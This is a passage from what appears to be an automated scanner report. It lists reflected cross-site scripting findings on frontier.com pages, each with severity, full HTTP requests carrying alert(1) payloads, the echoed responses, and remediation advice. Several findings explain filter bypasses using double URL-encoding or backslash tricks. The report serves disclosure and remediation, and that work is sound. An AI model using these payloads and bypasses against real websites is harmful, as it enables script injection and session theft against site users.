Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Controls56e88'%3b3d6207f3d2f/VirtualCode.ashx?pageid=98&origPath=%2fftr.css%2f HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43355


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?aspxerrorpath=/Controls56e88';3d6207f3d2f/VirtualCode.ashx');//]]>
...[SNIP]...

2.33. http://frontier.com/Controls/VirtualCode.ashx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /Controls/VirtualCode.ashx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73438%2527%253balert%25281%2529%252f%252f0fdd979cf43 was submitted in the REST URL parameter 2. This input was echoed as 73438';alert(1)//0fdd979cf43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Controls/VirtualCode.ashx73438%2527%253balert%25281%2529%252f%252f0fdd979cf43?pageid=98&origPath=%2fftr.css%2f HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43927


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Controls/VirtualCode.ashx73438';alert(1)//0fdd979cf43?pageid=98&origPath=/ftr.css/');//]]>
...[SNIP]...

2.34. http://frontier.com/Images/2011promo/bg-grey.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /Images/2011promo/bg-grey.jpg

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7327a%2527%253balert%25281%2529%252f%252f2dd01931fc3 was submitted in the REST URL parameter 1. This input was echoed as 7327a';alert(1)//2dd01931fc3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Images7327a%2527%253balert%25281%2529%252f%252f2dd01931fc3/2011promo/bg-grey.jpg HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43683


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Images7327a';alert(1)//2dd01931fc3/2011promo/bg-grey.jpg');//]]>
...[SNIP]...

2.35. http://frontier.com/Images/2011promo/bg-grey.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /Images/2011promo/bg-grey.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 611ec%2527%253balert%25281%2529%252f%252f635909959d4 was submitted in the REST URL parameter 2. This input was echoed as 611ec';alert(1)//635909959d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Images/2011promo611ec%2527%253balert%25281%2529%252f%252f635909959d4/bg-grey.jpg HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43683


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Images/2011promo611ec';alert(1)//635909959d4/bg-grey.jpg');//]]>
...[SNIP]...

2.36. http://frontier.com/Images/2011promo/bg-grey.jpg [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /Images/2011promo/bg-grey.jpg

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cde47%2527%253balert%25281%2529%252f%252fcff2b560950 was submitted in the REST URL parameter 3. This input was echoed as cde47';alert(1)//cff2b560950 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Images/2011promo/bg-grey.jpgcde47%2527%253balert%25281%2529%252f%252fcff2b560950 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43683


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Images/2011promo/bg-grey.jpgcde47';alert(1)//cff2b560950');//]]>
...[SNIP]...

2.37. http://frontier.com/Images/2011promo/bg-grey.jpg [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /Images/2011promo/bg-grey.jpg

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de098'%3balert(1)//67697fc3289 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as de098';alert(1)//67697fc3289 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Images/2011promo/bg-grey.jpg?de098'%3balert(1)//67697fc3289=1 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43733


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Images/2011promo/bg-grey.jpg?de098';alert(1)//67697fc3289=1');//]]>
...[SNIP]...

2.38. http://frontier.com/Shop/Login.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://frontier.com
Path:   /Shop/Login.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 866b2'%3b64e0a78ddc1 was submitted in the REST URL parameter 1. This input was echoed as 866b2';64e0a78ddc1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shop866b2'%3b64e0a78ddc1/Login.aspx HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43291


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?aspxerrorpath=/Shop866b2';64e0a78ddc1/Login.aspx');//]]>
...[SNIP]...

2.39. http://frontier.com/Shop/Login.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /Shop/Login.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb7ff%2527%253balert%25281%2529%252f%252f4743277aa69 was submitted in the REST URL parameter 2. This input was echoed as eb7ff';alert(1)//4743277aa69 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Shop/Login.aspxeb7ff%2527%253balert%25281%2529%252f%252f4743277aa69 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43573


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Shop/Login.aspxeb7ff';alert(1)//4743277aa69');//]]>
...[SNIP]...

2.40. http://frontier.com/winwin1 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /winwin1

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d97a2%2527%253balert%25281%2529%252f%252f5a9a39ab965 was submitted in the REST URL parameter 1. This input was echoed as d97a2';alert(1)//5a9a39ab965 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /winwin1d97a2%2527%253balert%25281%2529%252f%252f5a9a39ab965?mkwid=sPb9VHDZ0&pcrid=14742396110 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43781


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/winwin1d97a2';alert(1)//5a9a39ab965?mkwid=sPb9VHDZ0&pcrid=14742396110');//]]>
...[SNIP]...

2.41. http://frontier.com/winwin1 [mkwid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /winwin1

Issue detail

The value of the mkwid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4cd51'%3balert(1)//f8a5646b3ab was submitted in the mkwid parameter. This input was echoed as 4cd51';alert(1)//f8a5646b3ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /winwin1?mkwid=sPb9VHDZ04cd51'%3balert(1)//f8a5646b3ab&pcrid=14742396110 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52186


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/VirtualPage.aspx?pageid=1018&origPath=/winwin1&mkwid=sPb9VHDZ04cd51';alert(1)//f8a5646b3ab&pcrid=14742396110');//]]>
...[SNIP]...

2.42. http://frontier.com/winwin1 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /winwin1

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2473b'%3balert(1)//867912431c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2473b';alert(1)//867912431c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110&2473b'%3balert(1)//867912431c1=1 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52233


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/VirtualPage.aspx?pageid=1018&origPath=/winwin1&mkwid=sPb9VHDZ0&pcrid=14742396110&2473b';alert(1)//867912431c1=1');//]]>
...[SNIP]...

2.43. http://frontier.com/winwin1 [pcrid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /winwin1

Issue detail

The value of the pcrid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59505'%3balert(1)//f0a2d5e98b9 was submitted in the pcrid parameter. This input was echoed as 59505';alert(1)//f0a2d5e98b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /winwin1?mkwid=sPb9VHDZ0&pcrid=1474239611059505'%3balert(1)//f0a2d5e98b9 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52186


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/VirtualPage.aspx?pageid=1018&origPath=/winwin1&mkwid=sPb9VHDZ0&pcrid=1474239611059505';alert(1)//f0a2d5e98b9');//]]>
...[SNIP]...

2.44. http://games.frontier.com/WebAnalysis/APP/GenerateCode.ashx [lc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.frontier.com
Path:   /WebAnalysis/APP/GenerateCode.ashx

Issue detail

The value of the lc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 434e0\'%3balert(1)//c3ce629f4e0 was submitted in the lc parameter. This input was echoed as 434e0\\';alert(1)//c3ce629f4e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes. The backslash must be escaped before the quotation marks are; if the quotes are escaped first, the backslash that was placed in front of each quote is itself doubled and the quote is left unescaped again.

Request

GET /WebAnalysis/APP/GenerateCode.ashx?pagefilename=game&code=119282623&lc=en434e0\'%3balert(1)//c3ce629f4e0&channel=110464377 HTTP/1.1
Host: games.frontier.com
Proxy-Connection: keep-alive
Referer: http://games.frontier.com/game.htm?code=119282623&lc=en&channel=110464377
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=oberonfrontier%3D%2526pid%253DhomePage%2526pidt%253D1%2526oid%253Dhttp%25253A//games.frontier.com/game.htm%25253Fcode%25253D119282623%252526lc%25253Den%252526channel%25253D110464377%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 3416
Cache-Control: private, max-age=14400
Date: Tue, 06 Sep 2011 12:50:58 GMT
Connection: close

try{var s_account='oberonfrontier';
var s=s_gi(s_account);
GameCatalog.WebAnalysis.SiteTracking.Replacer.symbols = {'%%tcp-disconnect-status%%' : function(){ return GameShell.GetTcpDisconnectStatus
...[SNIP]...
